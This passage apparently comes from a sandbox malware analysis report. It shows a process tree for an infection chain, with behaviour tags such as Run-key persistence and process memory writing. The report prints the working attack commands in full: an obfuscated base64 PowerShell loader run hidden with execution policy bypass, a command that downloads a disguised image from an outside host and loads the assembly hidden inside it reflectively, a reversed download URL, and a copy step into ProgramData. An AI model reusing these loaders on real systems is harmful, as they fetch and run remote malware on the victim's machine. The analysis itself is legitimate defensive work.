৻YQBy⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBn⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQBn⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻r⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BG⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQBn⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻ZwB0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻Ow⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻YQBz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Ng⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻Ew⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻ZQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQB4⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻LQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻cgB0⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻bgBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻QwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻ZQBU⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻UwB1⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻aQBu⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HI⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Hg⦷ ⠊ ⟙ ᧳ ৻L⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻ZwB0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻bwBu⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻ZQBy⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻RgBy⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻bQBC⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻N⦷ ⠊ ⟙ ᧳ ৻BT⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻cgBp⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Zw⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YgBh⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻2⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻QwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bs⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻YQBk⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BB⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YgBs⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻9⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻WwBT⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻cwB0⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻FI⦷ ⠊ ⟙ ᧳ ৻ZQBm⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻aQBv⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻LgBB⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cwBl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻YgBs⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻XQ⦷ ⠊ ⟙ ᧳ ৻6⦷ ⠊ ⟙ ᧳ ৻Do⦷ ⠊ ⟙ ᧳ ৻T⦷ ⠊ ⟙ ᧳ ৻Bv⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻YwBv⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻bQBh⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BC⦷ ⠊ ⟙ ᧳ ৻Hk⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻KQ⦷ ⠊ ⟙ ᧳ ৻7⦷ ⠊ ⟙ ᧳ ৻CQ⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻B5⦷ ⠊ ⟙ ᧳ ৻H⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻ZQ⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻bwBh⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻ZQBk⦷ ⠊ ⟙ ᧳ ৻EE⦷ ⠊ ⟙ ᧳ ৻cwBz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻bQBi⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻eQ⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ec⦷ ⠊ ⟙ ᧳ ৻ZQB0⦷ ⠊ ⟙ ᧳ ৻FQ⦷ ⠊ ⟙ ᧳ ৻eQBw⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻bgBs⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻Tw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻Eg⦷ ⠊ ⟙ ᧳ ৻bwBt⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ds⦷ ⠊ ⟙ ᧳ ৻J⦷ ⠊ ⟙ ᧳ ৻Bt⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻D0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻eQBw⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻LgBH⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻BN⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bo⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻VgBB⦷ ⠊ ⟙ ᧳ ৻Ek⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻SQBu⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻bwBr⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻K⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻k⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻dQBs⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻L⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Fs⦷ ⠊ ⟙ ᧳ ৻bwBi⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻ZQBj⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻WwBd⦷ ⠊ ⟙ ᧳ ৻F0⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻o⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻NwBh⦷ ⠊ ⟙ ᧳ ৻Dc⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻Dk⦷ ⠊ ⟙ ᧳ ৻MwBl⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻NQ⦷ ⠊ ⟙ ᧳ ৻0⦷ ⠊ ⟙ ᧳ ৻GM⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻MwBh⦷ ⠊ ⟙ ᧳ ৻C0⦷ ⠊ ⟙ ᧳ ৻Mw⦷ ⠊ ⟙ ᧳ ৻1⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻N⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻t⦷ ⠊ ⟙ ᧳ ৻DI⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻4⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻LQBh⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻M⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻x⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻y⦷ ⠊ ⟙ ᧳ ৻D⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻PQBu⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻awBv⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻JgBh⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻PQB0⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻YQ⦷ ⠊ ⟙ ᧳ ৻/⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻e⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻C4⦷ ⠊ ⟙ ᧳ ৻MQ⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻Go⦷ ⠊ ⟙ ᧳ ৻bg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻LwBt⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Yw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻bwBw⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻c⦷ ⠊ ⟙ ᧳ ৻Bw⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻LgBm⦷ ⠊ ⟙ ᧳ ৻DY⦷ ⠊ ⟙ ᧳ ৻OQBm⦷ ⠊ ⟙ ᧳ ৻DQ⦷ ⠊ ⟙ ᧳ ৻LQBy⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻Yg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻Lw⦷ ⠊ ⟙ ᧳ ৻w⦷ ⠊ ⟙ ᧳ ৻HY⦷ ⠊ ⟙ ᧳ ৻LwBt⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻Yw⦷ ⠊ ⟙ ᧳ ৻u⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻aQBw⦷ ⠊ ⟙ ᧳ ৻GE⦷ ⠊ ⟙ ᧳ ৻ZQBs⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻bwBv⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻LgBl⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻YQBy⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bz⦷ ⠊ ⟙ ᧳ ৻GU⦷ ⠊ ⟙ ᧳ ৻cwBh⦷ ⠊ ⟙ ᧳ ৻GI⦷ ⠊ ⟙ ᧳ ৻ZQBy⦷ ⠊ ⟙ ᧳ ৻Gk⦷ ⠊ ⟙ ᧳ ৻Zg⦷ ⠊ ⟙ ᧳ ৻v⦷ ⠊ ⟙ ᧳ ৻C8⦷ ⠊ ⟙ ᧳ ৻OgBz⦷ ⠊ ⟙ ᧳ ৻H⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻B0⦷ ⠊ ⟙ ᧳ ৻Gg⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻DE⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻g⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻EM⦷ ⠊ ⟙ ᧳ ৻OgBc⦷ ⠊ ⟙ ᧳ ৻F⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻cgBv⦷ ⠊ ⟙ ᧳ ৻Gc⦷ ⠊ ⟙ ᧳ ৻cgBh⦷ ⠊ ⟙ ᧳ ৻G0⦷ ⠊ ⟙ ᧳ ৻R⦷ ⠊ ⟙ ᧳ ৻Bh⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻YQBc⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻I⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻s⦷ ⠊ ⟙ ᧳ ৻C⦷ ⠊ ⟙ ᧳ ৻⦷ ⠊ ⟙ ᧳ ৻JwBl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻d⦷ ⠊ ⟙ ᧳ ৻Bl⦷ ⠊ ⟙ ᧳ ৻Gw⦷ ⠊ ⟙ ᧳ ৻b⦷ ⠊ ⟙ ᧳ ৻Bp⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻bgBh⦷ ⠊ ⟙ ᧳ ৻HQ⦷ ⠊ ⟙ ᧳ ৻bw⦷ ⠊ ⟙ ᧳ ৻n⦷ ⠊ ⟙ ᧳ ৻Cw⦷ ⠊ ⟙ ᧳ ৻JwBB⦷ ⠊ ⟙ ᧳ ৻GQ⦷ ⠊ ⟙ ᧳ ৻Z⦷ ⠊ ⟙ ᧳ ৻BJ⦷ ⠊ ⟙ ᧳ ৻G4⦷ ⠊ ⟙ ᧳ ৻U⦷ ⠊ ⟙ ᧳ ৻By⦷ ⠊ ⟙ ᧳ ৻G8⦷ ⠊ ⟙ ᧳ ৻YwBl⦷ ⠊ ⟙ ᧳ ৻HM⦷ ⠊ ⟙ ᧳ ৻cw⦷ ⠊ ⟙ ᧳ ৻z⦷ ⠊ ⟙ ᧳ ৻DI⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻s⦷ ⠊ ⟙ ᧳ ৻Cc⦷ ⠊ ⟙ ᧳ ৻Jw⦷ ⠊ ⟙ ᧳ ৻p⦷ ⠊ ⟙ ᧳ ৻Ck⦷ ⠊ ⟙ ᧳ ৻';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('⦷ ⠊ ⟙ ᧳ ৻','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2756
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('7a7d093e054c-a03a-3544-2b8a-aa01dd20=nekot&aidem=tla?txt.13jn/o/moc.topsppa.f69f4-redalb/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'estellionato','AddInProcess32',''))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3640
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\estellionato.vbs"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4528
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        6⤵
